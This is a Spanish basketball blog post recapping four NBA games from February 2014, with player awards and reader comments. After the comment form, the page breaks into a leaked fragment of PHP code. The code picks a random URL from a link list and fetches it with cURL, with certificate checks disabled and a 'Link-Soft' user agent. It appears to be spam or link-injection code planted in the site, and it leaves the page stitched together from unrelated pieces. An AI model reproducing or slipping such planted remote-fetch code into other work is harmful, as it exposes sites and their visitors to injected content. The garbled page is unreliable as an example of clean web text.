La Crónica: Noche de golpes

05 de February de 2014 por Simon

3 de los 4 partidos que se jugaron ayer se saldaron con victorias visitantes. Sólo Minnesota fue capaz de hacer valer su factor cancha, aunque eso sí, lo tenían fácil porque su rival eran los Lakers. Antes del partido, los angelinos informaban que su trío de bases estaba disponible para regresar a la acción y que Steve Nash y Blake lo harían ya esa misma noche mientras que Farmar esperaría un día más. Difícil va a estar el reparto de minutos ahora para Mike D´Antoni que recordemos también cuenta con Kendall Marshall. De todas maneras, la mala suerte no ha dejado de cebarse con los Lakers. Jodie Meeks se lesionó el tobillo en el minuto 1, Jordan Hill sufrió un esguince cervical que le impedía continuar el juego cuando solo hacía 3 minutos que había saltado a la cancha y el propio Blake sufría una rotura de tímpano durante la primera parte aunque pudo seguir jugando. La mala fortuna angelina  está alcanzando cotas inimaginables. Centrándonos en lo que fue estrictamente el partido, los Wolves pudieron jugar a su aire desde el primer momento. Les permitieron jugadas rápidas y tiros fáciles, lo que provocó que los casi 40 puntos anotados en el primer cuarto dejaran ya el partido prácticamente visto para sentencia (99-109). El susto de la noche lo dio Kevin Love que se pegó un costalazo tremendo tras una entrada a canasta.

Partido incómodo el que tenían los Pacers en un campo complicado como es el Philips Arena de Atlanta. Desde el primer cuarto se dieron cuenta de que no iba a ser tarea fácil y en la primera mitad imperó sobre todo la igualdad. Cada intento de conseguir ventaja de los Pacers era respondido por los Hawks apoyados sobre todo en la aportación de su sorprendente banquillo. Por fin, en el tercer cuarto Indiana consiguió abrir algo de brecha y tomar una ventaja que superó los 10 puntos. En el último cuarto, a pesar del esfuerzo de los locales, los Pacers no dieron concesiones y terminaron cerrando un complicado duelo (89-85). Si tremendo fue el golpe que dio Kevin Love, más espectacular y duro fue el que sufrió Lance Stephenson en una acción similar. 

Por su parte, los Golden State Warriors continúan dando una mala imagen esta temporada y a pesar de estar asentados en Play Off no están cumpliendo las expectativas que despertaron a principio de temporada. Su juego está llena de altibajos y ayer fue un claro ejemplo pues los Bobcats fueron capaces de sacarle los colores en su propia casa. El partido  fue un absoluto despropósito por parte de los Warriors con multitud de tiros fáciles fallados mientras Charlotte hacía y deshacía a su antojo de la mano de un enorme Al Jefferson. Los visitantes finalmente se hicieron con una victoria que ni ellos podían creer que hubiera sido tan fácil (91-75). Buen momento el que atraviesan los Bobcats que han conseguido cerrar su mini gira de 4 partidos por el Oeste con 3 victorias que les dan algo de margen respecto a sus perseguidores. Precisamente los mayores rivales en la clasificación de Golden State son actualmente los Phoenix Suns, con los que mantienen una dura pugna por el sexto puesto de conferencia Oeste. Ayer los de Arizona no consiguieron sumar una nueva victoria en casa pues los Bulls cuajaron un partido muy serio imponiendo su potencia en la zona gracias al dominio en el rebote de Joakim Noah y Carlos Boozer. Ni una vez estuvieron los Suns por delante en el marcador lo que da idea de la superioridad que exhibieron ayer los Bulls (101-92).

PREMIOS

MVP: Kevin Love no encontró mucha oposición en el juego interior de los Lakers y pudo irse tranquilamente a los 31 puntos y 17 rebotes. Al Jefferson consiguió 30 puntos y 13 rebotes contra un gran defensor como es Andrew Bogut por lo que deberíamos darle algo más merito.

Sorpresa: ¿Many Harris? Reconozco que no tenía ni idea de que había firmado por los los Lakers ante el aluvión de lesiones que sufren. Lo bueno es que pocas horas después de que se confirmara que seguramente no renovará por la franquicia angelina, anoche fue el mejor del equipo con 19 puntos (8 de 11) y 8 rebotes.

Decepción: Lamentable partido el que protagonizó anoche David Lee. Se quedó en 8 puntos con un 3 de 13 y además sólo consiguió capturar 3 rebotes. Gerald Green también vivió una noche aciaga y falló 11 de sus 13 lanzamientos.

Esfuerzo en vano: Premio compartido entre Many Harris (recordemos, jugador de los Lakers) y Stephen Curry que anotó 17 puntos y repartió 11 asistencias.

TOP-5

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. Esteban dice:
    #1

    enserio all jefferson no va al all star? es decir, que en principio habria dos pivotes que estan haciendo mejor temporada que el?

    en los ultimos 15 partidos debe estar en los 24 puntos y 11 rebotes de promedio

      Citar

  2. infante dice:
    #2

    ¿Soy el único que piensa que a Millsap se le debería sancionar por hacerle la cama a Stephenson? Es que se puede matar…

      Citar

  3. Sancho88 dice:
    #3

    El problema de Stephenson es que va a lo loco a la canasta, y así le pasa lo que le pasa. No puede ser culpa de Millsap que el chaval se crea superman. En eso se tendría que moderar, vale que se lo pase como un chiquillo en la cancha y le de por bailar en medio de una jugada, al dar un pase, al meter una canasta, etc. Pero cuando se está jugando el físico en una entrada a canasta es a los propietarios a los que no les debe hacer nada de gracia esa actitud. Por tanto, no es culpa de Millsap, sino de la cabeza de este señor. Muchos equipos tendrían que aprender de la disciplina de Spurs con las highlights. No sé si se lo oí decir a Daimiel, que los Spurs solo han hecho 7 alley-hoops en los últimos 5 años, o algo así. Realmente tiene sentido, porque son jugadas muy peligrosas que valen lo mismo que una bandeja a tabla de Tim Duncan. Sinceramente, a mí ya no me parece tan espectacular ver eso en la liga, lo tenemos ‘requetevisto’, e incluso Blake Grifin, el matador por excelencia de la liga, se está reciclando y está empezando a jugar con fundamentos. Howard también intenta hacer algunas cosillas, pero el pobre da para lo que da. Alley-Hoop a medio metro de canasta y poco más. Se le ven algunos movimientos más desde que entrenó aquellos días con Olajuwon, pero como el propio Olajuwon diría… este chico está muy verde

      Citar

  4. Sancho88 dice:
    #4

    Ojo que Lakers van a jugar con 4. Se caga la perra!! Kaman y Sacre eliminados por faltas, Farmar más cojo que un puente de Calatrava… total, no tienen a nadie para jugar estos 3 últimos minutos… impresionante. Jamás lo había visto en la NBA

      Citar

  5. Sancho88 dice:
    #5

    6 faltas y el chaval sigue jugando… esto sí que es la hostia

      Citar

  6. Sancho88 dice:
    #6

    Ah hostia. Ok. Ahora se explica todo. Ningún equipo de la NBA puede jugar con menos de 5 tíos. Si un tío hace 6 faltas y no hay ni dios en el banquillo porque están todos eliminados o lesionados, la NBA te castiga con una falta técnica en contra pero ese señor de las seis faltas puede seguir jugando. Pues sí, no son las summer leagues. Partido oficial y Sacre jugando los últimos tres minutos con 6 faltas. Solo le podía pasar esto al gran Robert Sacre, 😀

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>